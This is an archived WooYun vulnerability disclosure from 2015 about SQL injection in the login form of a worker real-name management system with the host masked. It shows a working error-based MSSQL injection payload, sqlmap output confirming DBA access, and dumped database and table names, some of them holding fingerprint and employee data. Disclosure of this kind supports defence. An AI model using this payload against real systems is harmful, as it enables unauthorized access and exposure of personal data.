乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-09: 细节已通知厂商并且等待厂商处理中 2015-10-13: 厂商已经确认,细节仅向厂商公开 2015-10-23: 细节向核心白帽子及相关领域专家公开 2015-11-02: 细节向普通白帽子公开 2015-11-12: 细节向实习白帽子公开 2015-11-27: 细节向公众公开
RT
URL:http://**.**.**.**:8012/login.aspx
测试注入:
POST /login.aspx HTTP/1.1Host: **.**.**.**:8012Proxy-Connection: keep-aliveContent-Length: 349Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://**.**.**.**:8012User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**:8012/login.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8__VIEWSTATE=%2FwEPDwUKLTc4NTc0ODYxOWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFDEltYWdlQnV0dG9uMgUMSW1hZ2VCdXR0b24xa3OD%2Bg4lEUPB%2BJsmGq%2FVMwgAOHQ%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWBQLQ3t%2B6CwLs0bLrBgLs0fbZDALSwtXkAgLSwpnTCGEQxOOPY6dcOlWAgRH%2BS1AJHtQk&TextBox1=admin&TextBox2=admin&ImageButton2.x=0&ImageButton2.y=0
数据库:
available databases [60]:[*] 04F-MEP[*] 1111[*] 16F-MEP[*] 5FBIM[*] B1F[*] BIMFIMBasic[*] BIMFIMUserManage[*] BJ_IKEA_B1_MEP[*] CostManage[*] CscecKq_GPRS[*] HBDS01[*] HBDS02[*] JPS[*] JPS-XT[*] JZ[*] master[*] model[*] MR2000DB[*] msdb[*] NT[*] ProjectDocument[*] ProjectDocument1[*] ProjectDocument10[*] ProjectDocument11[*] ProjectDocument3[*] ProjectDocument4[*] ProjectDocument6[*] ProjectDocument9[*] QD[*] RD[*] ReportServer[*] ReportServerTempDB[*] RFD[*] SH_SOHO_AS[*] SH_SOHO_B1_AS[*] SH_SOHO_B1_MEP[*] SH_SOHO_B2_MEP[*] SH_SOHO_B3_MEP[*] tempdb[*] WH_IKEA_GLF[*] WH_IKEA_L10_LDJF[*] WH_IKEA_L10A[*] WH_IKEA_L10B[*] WH_IKEA_L10C[*] WH_IKEA_L11A[*] WH_IKEA_L11B[*] WH_IKEA_L11C[*] WH_IKEA_L12A[*] WH_IKEA_L12B[*] WH_IKEA_L12C[*] WH_IKEA_L13A[*] WH_IKEA_L13B[*] WH_IKEA_L13C[*] WH_IKEA_L14C[*] WH_IKEA_L15[*] WH_JD_N4_CF[*] Wul_DataAnalysis[*] XFD[*] XFS[*] zk
权限:
sqlmap resumed the following injection point(s) from stored session:---Parameter: TextBox1 (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUKLTc4NTc0ODYxOWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFDEltYWdlQnV0dG9uMgUMSW1hZ2VCdXR0b24xa3OD+g4lEUPB+JsmGq/VMwgAOHQ=&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=/wEWBQLQ3t+6CwLs0bLrBgLs0fbZDALSwtXkAgLSwpnTCGEQxOOPY6dcOlWAgRH+S1AJHtQk&TextBox1=admin'+(SELECT 'wEcF' WHERE 1310=1310 AND 7705=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(118)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7705=7705) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(122)+CHAR(113))))+'&TextBox2=admin&ImageButton2.x=0&ImageButton2.y=0---[19:45:57] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008[19:45:57] [INFO] testing if current user is DBAcurrent user is DBA: True[19:45:57] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\**.**.**.**'
CscecKq_GPRS:
[103 tables]+---------------------------+| ANQUANJISHU_JIAODI || AQHYI || AQHYI_SDEMP_COUNT || AQJSJD_SDEMP_COUNT || AQJSJD_YDEMP_COUNT || AQPX_TYPE || AQ_PX || AQ_PX_SDEMP_COUNT || BANZU || DB_BACKUP || Depart || DoorRightList || EMPLOYEE || EMP_BX || EMP_GLRY || EMP_GLRY_TYPE || EMP_GZ || EMP_HEIMINGDAN || EmpManage || FB_BASE || FB_BZ_EMP || FB_LIANXIREN || GANGWEI_BASE || GC_TYPE || GENZONG_ZHUTI || GS_User || GWZHIZE_XM || GZJS_TYPE || GZ_BASE || HB_UPLOADCONFIG || JCX_JY_SDEMP_COUNT || JCX_JY_YDEMP_COUNT || JG_XINGSHI || JINGCHANGX_AQJY || JUPD_DENGJI || JXCAQJY_TYPE || KQMACHINE_GL || LBLY_GL || LBLY_GL_MX || LBWUL_BASE || LOGIN_EMP || NICY_GLMS || QIYE_TYPE || QX_ENABLE || QX_FB_F_XM || QX_FENG_XM || QX_GROUP || QX_MAIN || QX_SUOSHUZU || QX_TZJMC || QX_XIANGMU || SANJI_AQJY_DJ || SYS_LOG || SYS_NEWS || TESHU_GZ_BASE || TZJMC || TZJMC_SET || T_KQ || XINXI_LAIYUAN || XM_BASE || YH_XINXI || ZHUZZHI_TYPE || ZIZHI_DENGJI || _GPRSKQ_DATAGET || _GPRS_Analys_Log || _GPRS_Communication || _GPRS_Communication_TMP || _GPRS_DoorControl_KongABC || _GPRS_DoorRightList || _GPRS_Employee_tmp || _GPRS_Error || _GPRS_FP_SendResult || _GPRS_Fp_fpData1 || _GPRS_Fp_fpData2 || _GPRS_Fp_fpData3 || _GPRS_Fp_fpData4 || _GPRS_Fp_fpIC || _GPRS_Fp_fpID || _GPRS_Fp_fpName || _GPRS_Fp_fpPwd || _GPRS_ID || _GPRS_ID_DoorControl || _GPRS_KQ_Data || _GPRS_KQ_Data_HIST || _GPRS_KQ_Data_HIST2 || _GPRS_KQ_Data_HIST3 || _GPRS_Language || _GPRS_UpTime || _GPRS_yuansdkjl || _GPRS_yuansdkjl_HIST || _GPRS_yuansdkjl_HIST2 || _GPRS_yuansdkjl_HIST3 || _KQCANSHU || _YL_Card || dtproperties || pbcatcol || pbcatedt || pbcatfmt || pbcattbl || pbcatvld || skySecCredit || tb_card_rec || tb_worker |+---------------------------+
这个站主要是关于实名制信息管理系统,目测会泄露很多个人信息。介于数量量太大就没再进一步测试了。
危害等级:中
漏洞Rank:8
确认时间:2015-10-13 17:51
CNVD确认所述情况,已经转由CNCERT下发给湖北分中心,由其后续尝试协调网站管理单位处置(需建立新的工作联系).
暂无